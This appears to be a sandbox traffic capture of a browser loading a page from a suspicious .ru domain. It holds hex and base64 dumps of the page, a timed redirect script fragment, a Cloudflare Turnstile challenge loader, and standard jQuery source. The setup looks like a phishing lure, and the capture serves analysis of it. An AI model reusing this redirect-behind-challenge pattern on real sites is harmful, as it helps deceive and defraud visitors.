                                        2025-02-15 19:34:47 UTC1369INData Raw: 35 79 5a 58 42 73 59 57 4e 6c 4b 43 64 6f 64 48 52 77 63 7a 6f 76 4c 33 64 33 64 79 35 30 59 58 4a 6e 5a 58 51 75 59 32 39 74 4a 79 6b 37 43 69 41 67 49 43 41 67 49 43 41 67 66 51 6f 67 49 43 41 67 66 53 77 67 4d 54 41 77 4b 54 73 4b 66 53 6b 6f 4b 54 73 4b 49 43 41 67 49 44 77 76 63 32 4e 79 61 58 42 30 50 67 6f 67 49 43 41 67 50 48 4e 6a 63 6d 6c 77 64 43 42 7a 63 6d 4d 39 49 6d 68 30 64 48 42 7a 4f 69 38 76 59 32 39 6b 5a 53 35 71 63 58 56 6c 63 6e 6b 75 59 32 39 74 4c 32 70 78 64 57 56 79 65 53 30 7a 4c 6a 59 75 4d 43 35 74 61 57 34 75 61 6e 4d 69 50 6a 77 76 63 32 4e 79 61 58 42 30 50 67 6f 67 49 43 41 67 50 48 4e 6a 63 6d 6c 77 64 43 42 7a 63 6d 4d 39 49 6d 68 30 64 48 42 7a 4f 69 38 76 59 32 68 68 62 47 78 6c 62 6d 64 6c 63 79 35 6a 62 47 39 31 5a
                                        Data Ascii: 5yZXBsYWNlKCdodHRwczovL3d3dy50YXJnZXQuY29tJyk7CiAgICAgICAgfQogICAgfSwgMTAwKTsKfSkoKTsKICAgIDwvc2NyaXB0PgogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY29kZS5qcXVlcnkuY29tL2pxdWVyeS0zLjYuMC5taW4uanMiPjwvc2NyaXB0PgogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91Z
                                        2025-02-15 19:34:47 UTC1369INData Raw: 79 4d 7a 49 7a 4d 6a 4d 37 5a 6d 39 75 64 43 31 6d 59 57 31 70 62 48 6b 36 4c 57 46 77 63 47 78 6c 4c 58 4e 35 63 33 52 6c 62 53 78 7a 65 58 4e 30 5a 57 30 74 64 57 6b 73 59 6d 78 70 62 6d 74 74 59 57 4e 7a 65 58 4e 30 5a 57 31 6d 62 32 35 30 4c 46 4e 6c 5a 32 39 6c 49 46 56 4a 4c 48 4a 76 59 6d 39 30 62 79 78 76 65 48 6c 6e 5a 57 34 73 64 57 4a 31 62 6e 52 31 4c 45 68 6c 62 48 5a 6c 64 47 6c 6a 59 53 42 4f 5a 58 56 6c 4c 47 46 79 61 57 46 73 4c 48 4e 68 62 6e 4d 74 63 32 56 79 61 57 59 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 30 63 48 67 37 5a 6d 39 75 64 43 31 33 5a 57 6c 6e 61 48 51 36 4e 44 41 77 4f 79 31 33 5a 57 4a 72 61 58 51 74 5a 6d 39 75 64 43 31 7a 62 57 39 76 64 47 68 70 62 6d 63 36 59 57 35 30 61 57 46 73 61 57 46 7a 5a 57 51 37 5a 6d
                                        Data Ascii: yMzIzMjM7Zm9udC1mYW1pbHk6LWFwcGxlLXN5c3RlbSxzeXN0ZW0tdWksYmxpbmttYWNzeXN0ZW1mb250LFNlZ29lIFVJLHJvYm90byxveHlnZW4sdWJ1bnR1LEhlbHZldGljYSBOZXVlLGFyaWFsLHNhbnMtc2VyaWY7Zm9udC1zaXplOjE0cHg7Zm9udC13ZWlnaHQ6NDAwOy13ZWJraXQtZm9udC1zbW9vdGhpbmc6YW50aWFsaWFzZWQ7Zm
                                        2025-02-15 19:34:47 UTC1369INData Raw: 56 48 4a 6c 57 6c 6c 4f 53 48 64 6d 52 56 6c 77 54 55 74 32 4c 43 4e 36 56 48 4a 6c 57 6c 6c 4f 53 48 64 6d 52 56 6c 77 54 55 74 32 49 43 35 30 56 47 4e 6d 56 31 5a 5a 62 6d 68 33 62 46 52 61 63 32 46 37 59 6d 39 34 4c 58 4e 6f 59 57 52 76 64 7a 70 70 62 6e 4e 6c 64 43 41 77 49 44 41 67 4d 43 41 6a 4d 44 4d 34 4d 54 49 33 4f 33 30 4b 49 33 70 55 63 6d 56 61 57 55 35 49 64 32 5a 46 57 58 42 4e 53 33 59 67 4c 6e 52 55 59 32 5a 58 56 6c 6c 75 61 48 64 73 56 46 70 7a 59 58 74 7a 64 48 4a 76 61 32 55 74 5a 47 46 7a 61 47 46 79 63 6d 46 35 4f 6a 49 30 4d 6a 74 7a 64 48 4a 76 61 32 55 74 5a 47 46 7a 61 47 39 6d 5a 6e 4e 6c 64 44 6f 79 4e 44 49 37 59 57 35 70 62 57 46 30 61 57 39 75 4f 6e 4e 30 63 6d 39 72 5a 53 41 75 4e 48 4d 67 59 33 56 69 61 57 4d 74 59 6d 56
                                        Data Ascii: VHJlWllOSHdmRVlwTUt2LCN6VHJlWllOSHdmRVlwTUt2IC50VGNmV1ZZbmh3bFRac2F7Ym94LXNoYWRvdzppbnNldCAwIDAgMCAjMDM4MTI3O30KI3pUcmVaWU5Id2ZFWXBNS3YgLnRUY2ZXVlluaHdsVFpzYXtzdHJva2UtZGFzaGFycmF5OjI0MjtzdHJva2UtZGFzaG9mZnNldDoyNDI7YW5pbWF0aW9uOnN0cm9rZSAuNHMgY3ViaWMtYmV
                                        2025-02-15 19:34:47 UTC1369INData Raw: 69 35 33 62 6d 64 48 51 6d 56 33 56 48 68 4c 63 48 5a 58 54 6e 52 55 5a 55 78 6a 63 6e 64 37 63 33 52 79 62 32 74 6c 4c 57 52 68 63 32 68 68 63 6e 4a 68 65 54 6f 78 4e 6a 59 37 63 33 52 79 62 32 74 6c 4c 57 52 68 63 32 68 76 5a 6d 5a 7a 5a 58 51 36 4d 54 59 32 4f 33 4e 30 63 6d 39 72 5a 53 31 33 61 57 52 30 61 44 6f 79 4f 33 4e 30 63 6d 39 72 5a 53 31 74 61 58 52 6c 63 6d 78 70 62 57 6c 30 4f 6a 45 77 4f 33 4e 30 63 6d 39 72 5a 54 6f 6a 5a 47 55 78 4d 7a 41 7a 4f 32 5a 70 62 47 77 36 49 32 52 6c 4d 54 4d 77 4d 7a 74 68 62 6d 6c 74 59 58 52 70 62 32 34 36 63 33 52 79 62 32 74 6c 49 43 34 32 63 79 42 6a 64 57 4a 70 59 79 31 69 5a 58 70 70 5a 58 49 6f 4c 6a 59 31 4c 44 41 73 4c 6a 51 31 4c 44 45 70 49 47 5a 76 63 6e 64 68 63 6d 52 7a 4f 33 30 4b 4c 6c 4a 4c
                                        Data Ascii: i53bmdHQmV3VHhLcHZXTnRUZUxjcnd7c3Ryb2tlLWRhc2hhcnJheToxNjY7c3Ryb2tlLWRhc2hvZmZzZXQ6MTY2O3N0cm9rZS13aWR0aDoyO3N0cm9rZS1taXRlcmxpbWl0OjEwO3N0cm9rZTojZGUxMzAzO2ZpbGw6I2RlMTMwMzthbmltYXRpb246c3Ryb2tlIC42cyBjdWJpYy1iZXppZXIoLjY1LDAsLjQ1LDEpIGZvcndhcmRzO30KLlJL
                                        2025-02-15 19:34:47 UTC1369INData Raw: 34 77 4f 44 55 73 4c 6a 59 34 4c 43 34 31 4d 79 6b 67 59 6d 39 30 61 44 74 69 59 57 4e 72 5a 33 4a 76 64 57 35 6b 4f 69 4e 6d 5a 6d 59 37 59 6d 39 79 5a 47 56 79 4f 6a 4a 77 65 43 42 7a 62 32 78 70 5a 43 41 6a 4e 6d 51 32 5a 44 5a 6b 4f 32 4a 76 63 6d 52 6c 63 69 31 79 59 57 52 70 64 58 4d 36 4d 33 42 34 4f 32 4a 76 65 43 31 7a 61 58 70 70 62 6d 63 36 59 6d 39 79 5a 47 56 79 4c 57 4a 76 65 44 74 6e 63 6d 6c 6b 4c 57 46 79 5a 57 45 36 4d 53 38 78 4f 32 68 6c 61 57 64 6f 64 44 6f 79 4e 48 42 34 4f 33 52 79 59 57 35 7a 61 58 52 70 62 32 34 36 59 57 78 73 49 43 34 78 63 79 42 6c 59 58 4e 6c 4c 57 6c 75 4f 33 64 70 5a 48 52 6f 4f 6a 49 30 63 48 67 37 65 69 31 70 62 6d 52 6c 65 44 6f 35 4f 54 6b 34 4f 33 30 4b 4c 6b 46 31 57 47 56 73 5a 55 31 32 55 48 49 67 4c
                                        Data Ascii: 4wODUsLjY4LC41MykgYm90aDtiYWNrZ3JvdW5kOiNmZmY7Ym9yZGVyOjJweCBzb2xpZCAjNmQ2ZDZkO2JvcmRlci1yYWRpdXM6M3B4O2JveC1zaXppbmc6Ym9yZGVyLWJveDtncmlkLWFyZWE6MS8xO2hlaWdodDoyNHB4O3RyYW5zaXRpb246YWxsIC4xcyBlYXNlLWluO3dpZHRoOjI0cHg7ei1pbmRleDo5OTk4O30KLkF1WGVsZU12UHIgL
                                        2025-02-15 19:34:47 UTC1369INData Raw: 76 62 6a 70 31 62 6e 4e 77 61 57 34 67 4c 6a 64 7a 49 47 4e 31 59 6d 6c 6a 4c 57 4a 6c 65 6d 6c 6c 63 69 67 75 4e 6a 55 73 4d 43 77 75 4e 44 55 73 4d 53 6b 67 5a 6d 39 79 64 32 46 79 5a 48 4d 37 66 51 6f 75 55 30 52 77 65 55 4e 76 62 32 74 6f 55 6c 70 48 63 6e 68 51 56 47 64 6b 55 45 6c 75 65 33 4e 30 63 6d 39 72 5a 53 31 33 61 57 52 30 61 44 6f 7a 63 48 67 37 63 33 52 79 62 32 74 6c 4c 57 78 70 62 6d 56 6a 59 58 41 36 63 6d 39 31 62 6d 51 37 63 33 52 79 62 32 74 6c 4f 69 4d 77 4d 7a 67 78 4d 6a 63 37 63 33 52 79 62 32 74 6c 4c 57 52 68 63 32 68 68 63 6e 4a 68 65 54 6f 77 4c 44 45 77 4d 43 77 77 4f 33 4e 30 63 6d 39 72 5a 53 31 6b 59 58 4e 6f 62 32 5a 6d 63 32 56 30 4f 6a 49 77 4d 44 74 7a 64 48 4a 76 61 32 55 74 62 57 6c 30 5a 58 4a 73 61 57 31 70 64 44
                                        Data Ascii: vbjp1bnNwaW4gLjdzIGN1YmljLWJlemllciguNjUsMCwuNDUsMSkgZm9yd2FyZHM7fQouU0RweUNvb2toUlpHcnhQVGdkUElue3N0cm9rZS13aWR0aDozcHg7c3Ryb2tlLWxpbmVjYXA6cm91bmQ7c3Ryb2tlOiMwMzgxMjc7c3Ryb2tlLWRhc2hhcnJheTowLDEwMCwwO3N0cm9rZS1kYXNob2Zmc2V0OjIwMDtzdHJva2UtbWl0ZXJsaW1pdD
                                        2025-02-15 19:34:47 UTC1369INData Raw: 57 6d 78 52 62 46 4e 57 54 55 74 6c 52 6b 77 67 59 54 70 6f 62 33 5a 6c 63 6e 74 6a 62 32 78 76 63 6a 6f 6a 4d 54 59 32 4d 7a 63 35 4f 33 30 4b 49 32 46 4b 65 6b 6c 42 64 6b 46 45 53 47 74 79 53 45 39 68 51 56 5a 79 51 56 5a 6d 55 30 52 77 57 43 77 6a 59 55 70 36 53 55 46 32 51 55 52 49 61 33 4a 49 54 32 46 42 56 6e 4a 42 56 6d 5a 54 52 48 42 59 4f 6d 78 70 62 6d 73 73 49 32 46 4b 65 6b 6c 42 64 6b 46 45 53 47 74 79 53 45 39 68 51 56 5a 79 51 56 5a 6d 55 30 52 77 57 44 70 32 61 58 4e 70 64 47 56 6b 4c 43 4e 57 54 6e 56 32 55 32 35 69 61 6d 5a 51 65 69 77 6a 56 6b 35 31 64 6c 4e 75 59 6d 70 6d 55 48 6f 36 62 47 6c 75 61 79 77 6a 56 6b 35 31 64 6c 4e 75 59 6d 70 6d 55 48 6f 36 64 6d 6c 7a 61 58 52 6c 5a 48 74 6a 62 32 78 76 63 6a 6f 6a 4d 6a 4d 79 4d 7a 49
                                        Data Ascii: WmxRbFNWTUtlRkwgYTpob3Zlcntjb2xvcjojMTY2Mzc5O30KI2FKeklBdkFESGtySE9hQVZyQVZmU0RwWCwjYUp6SUF2QURIa3JIT2FBVnJBVmZTRHBYOmxpbmssI2FKeklBdkFESGtySE9hQVZyQVZmU0RwWDp2aXNpdGVkLCNWTnV2U25iamZQeiwjVk51dlNuYmpmUHo6bGluaywjVk51dlNuYmpmUHo6dmlzaXRlZHtjb2xvcjojMjMyMzI


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.449748104.18.95.414432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-02-15 19:34:48 UTC670OUTGET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: script
                                        Referer: https://nr3hz5fbqd.bazefrost.ru/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-02-15 19:34:48 UTC386INHTTP/1.1 302 Found
                                        Date: Sat, 15 Feb 2025 19:34:48 GMT
                                        Content-Length: 0
                                        Connection: close
                                        access-control-allow-origin: *
                                        cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                        cross-origin-resource-policy: cross-origin
                                        location: /turnstile/v0/b/324d0dcf743c/api.js
                                        Server: cloudflare
                                        CF-RAY: 9127bcc71a1e4408-EWR
                                        alt-svc: h3=":443"; ma=86400


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        4192.168.2.449747151.101.66.1374432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-02-15 19:34:48 UTC629OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                        Host: code.jquery.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: script
                                        Referer: https://nr3hz5fbqd.bazefrost.ru/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-02-15 19:34:48 UTC614INHTTP/1.1 200 OK
                                        Connection: close
                                        Content-Length: 89501
                                        Server: nginx
                                        Content-Type: application/javascript; charset=utf-8
                                        Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                        ETag: "28feccc0-15d9d"
                                        Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                        Access-Control-Allow-Origin: *
                                        Cross-Origin-Resource-Policy: cross-origin
                                        Via: 1.1 varnish, 1.1 varnish
                                        Accept-Ranges: bytes
                                        Date: Sat, 15 Feb 2025 19:34:48 GMT
                                        Age: 3401174
                                        X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740060-EWR
                                        X-Cache: HIT, HIT
                                        X-Cache-Hits: 2774, 59
                                        X-Timer: S1739648088.171501,VS0,VE0
                                        Vary: Accept-Encoding
                                        2025-02-15 19:34:48 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                        Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                        2025-02-15 19:34:48 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                        Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                        2025-02-15 19:34:48 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                        Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                        2025-02-15 19:34:48 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                        Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                        2025-02-15 19:34:48 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                        Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                        2025-02-15 19:34:48 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                        Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                        2025-02-15 19:34:48 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                        Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                        2025-02-15 19:34:48 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                        Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                        2025-02-15 19:34:48 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                        Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
